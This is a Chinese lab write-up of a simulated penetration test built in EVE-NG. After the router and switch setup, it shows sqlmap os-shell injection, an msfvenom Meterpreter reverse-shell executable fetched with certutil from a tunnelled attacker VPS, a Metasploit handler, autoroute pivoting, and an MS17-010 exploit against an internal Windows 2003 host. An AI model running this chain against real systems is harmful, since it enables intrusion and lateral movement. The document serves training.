eve模拟真实环境的靶场渗透
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
作者 Catty
拓扑图

本实验模拟公网,左边kali通过sqlmap攻击右边Server_5并且os-shell,再通过反弹shell在MSF当中建立会话,再以Server_5为跳板机攻击内网当中另外一台没有映射服务的Win2003。
实验所用到的机器:
攻击机(紫色部分):kali(内网IP:192.168.117.241)
被攻击方(黄色部分):
Server_5(内网IP:172.16.192.88),映射了HTTP到公网上
WinServer(是一台2003,内网IP:172.16.192.4)
附加:Frp_Server(是一台EVE里面的kali,模拟公网VPS:202.100.1.3)
环境搭建:
紫色部分
SW1:(也可以不用划分vlan,默认都在vlan 1当中)
SW1(config)#vlan 10
SW1(config)#interface e0/0
SW1(config-if)#switchport mode access
SW1(config-if)#switchport access vlan 10
SW1(config)#int e0/1
SW1(config-if)#switchport mode access
SW1(config-if)#switchport access vlan 10
R3:
R3(config)#int e0/0
R3(config-if)#ip address 192.168.117.254 255.255.255.0
R3(config-if)#ip nat inside //配置NAT inside
R3(config-if)#no shutdown
R3(config)#int e0/1
R3(config-if)#ip address 12.0.0.1 255.255.255.0
R3(config-if)#no shutdown
R3(config-if)#ip nat outside //配置NAT outside
R3(config)#access-list 11 permit 192.168.117.0 0.0.0.255 //匹配流量
R3(config)#ip nat inside source list 11 interface Ethernet0/1 overload
这里讲究点是应该有一台DHCP服务器的,但是我内存不够了,带不动,所以直接在R3上面把DHCP服务也起了
ip dhcp excluded-address 192.168.117.254
!
ip dhcp pool kali
network 192.168.241.0 255.255.255.0
default-router 192.168.241.254
中间部分:
ISP:
ISP(config)#int e0/0
ISP(config-if)#ip address 12.0.0.2 255.255.255.0
ISP(config-if)#no shutdown
ISP(config)#int e0/2
ISP(config-if)#ip address 202.100.1.2 255.255.255.0
ISP(config-if)#no shutdown
ISP(config)#int e0/1
ISP(config-if)#ip address 23.0.0.2 255.255.255.0
ISP(config-if)#no shutdown
ISP(config)#int loopback 0 //建立环回口测试网络情况
ISP(config-if)#ip address 2.2.2.2 255.255.255.255
黄色部分:
SW2:
SW2(config)#vlan 10
SW2(config)#interface e0/0
SW2(config-if)#switchport mode access
SW2(config-if)#switchport access vlan 10
SW2(config)#int e0/1
SW2(config-if)#switchport mode access
SW2(config-if)#switchport access vlan 10
SW2(config)#int e0/2
SW2(config-if)#switchport mode access
SW2(config-if)#switchport access vlan 10
R5:
R5(config)#int e0/0
R5(config-if)#ip address 23.0.0.3
R5(config-if)#ip nat outside
R5(config-if)#no shutdown
R5(config)#int e0/1
R5(config-if)#ip address 172.16.192.254 255.255.255.0
R5(config-if)#no shutdown
R5(config-if)#ip nat inside //配置NAT outside
R5(config)#access-list 11 permit 172.16.192.0 0.0.0.255 //匹配流量
R5(config)#ip nat inside source list 11 interface Ethernet0/1 overload
R5(config)#ip nat inside source static tcp 172.16.192.88 80 23.0.0.3 80(把Server_5的HTTP服务映射到公网地址的80端口上)
//ISP,R3,R5配置OSPF模拟公网环境
R3(config)#router ospf 100
R3(config-router)# router-id 1.1.1.1
R3(config-router)#passive-interface Ethernet0/0
R3(config-router)#network 12.0.0.0 0.0.0.255 area 0
R5(config)#router ospf 100
R5(config-router)# router-id 3.3.3.3
R5(config-router)#passive-interface Ethernet0/1
R5(config-router)#network 23.0.0.0 0.0.0.255 area 0
ISP(config)#router ospf 100
ISP(config-router)# router-id 2.2.2.2
ISP(config-router)# network 2.2.2.2 0.0.0.0 area 0
ISP(config-router)#network 12.0.0.0 0.0.0.255 area 0
ISP(config-router)#network 23.0.0.0 0.0.0.255 area 0
ISP(config-router)#network 202.100.1.0 0.0.0.255 area 0
测试网络情况:
左边kali(通过dhclient获取地址)

访问Server_5,这里做一个DNS解析(本来一开始搭建了一台公网DNS服务器模拟公网映射的,但是运行环境真的顶不住了,所以就删掉了那台设备,直接修改本地hosts文件了)

将域名解析到23.0.0.3上面
添加完后记得重启网络服务喔
/etc/init.d/networking restart
访问一下web

OK!暂时莫得问题!!!
配置一下中间Frp_Server(202.100.1.3)的地址(图中名字弄错了,这该是的T和R居然在一起!!!)
本来是想用一台ubuntu来作这个frp服务端的,但我的EVE当中刚好有一个kali的镜像,那就不要那么多事了直接用EVE的kali吧

添加路由

装好frp

开启FRP,等待侦听

同时生成一个reverse.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=202.100.1.3 LPORT=6000 -f exe > reverse.exe

上面的LPORT=6000记得要和你frp客户端(也就是紫色的kali)配置文件当中的remote_port要一样喔
然后在当前文件夹下面开启http服务(待会要用到)

OK!!!!至此,中间的FRP服务器已经配置好了(当然,上述的操作你也可以直接在紫色部分的kali当中直接ssh到中间这台服务器上面进行操作,这样子会更好的模拟真实环境当中的VPS效果。我这里为了记录文档就没这么做了)
下面就直接到紫色部分的Kali当中模拟攻击吧!!!(有一点忘记说了,接下来的kali当中你会看到shell的主题经常变,并不是换了一台kali,而是我的~/.zshrc当中主题部分写了”random”)

- 首先先连接上frp


此时你会看到远程的frp_server当中有连接提示

- 使用sqlmap直接对Server_5进行os-shell(这是月师傅SQLMAP课程当中的一台靶机)
- 2.语句:
python sqlmap.py -u “http://www.dm1.com/inj.aspx?id=1” –dbms mssql –batch –is-dba –os-shell -p id –random-agent

那么此时,我需要这台Server_5运行我的一个反弹shell,让他可以和我的kali当中msf建立起会话,这个时候刚刚在frp_server当中启用的一个http服务就起作用了
可以看到,当前的目录路径是在C:\WINDOWS\SYSTEM32
那么,我们可以使用certutil.exe,一般看到成功完成就代表下载下来了,所以我就不dir来查看了

然后kali开启msfc
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(multi/handler) > set LPORT 5555 //这里的端口是frpc上面的local端口,记得一定要一样啊
LPORT => 5555
msf exploit(multi/handler) > exploit
接下来在sqlmap的os-shell当中运行reverse.exe

MSF当中出现会话

此时,因为我知道我还要对内网的一台2003进行渗透,那么就需要添加一下路由了,利用这台Server_5
先挂起会话,这里用post/multi/manage/autoroute

那么先进来shell当中看看,这里我是想直接扫描内网存活主机的,但是很容易就卡死了,所以我就直接shell到Server_5当中看arp表了

172.16.192.4这台主机,这里因为前面说的扫描卡死了,所以我就没有一开始扫描判断操作系统了,因为我知道这台就是那台2003(这里很粗糙,有太多已知因素)
这里使用(windows/smb/ms17_010_psexec)对目标进行攻击
先把payload改为

然后


查看会话表:

(这里之前失败了一次,所以2没了,直接到3了)
OK!!!实验结束。
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3453.html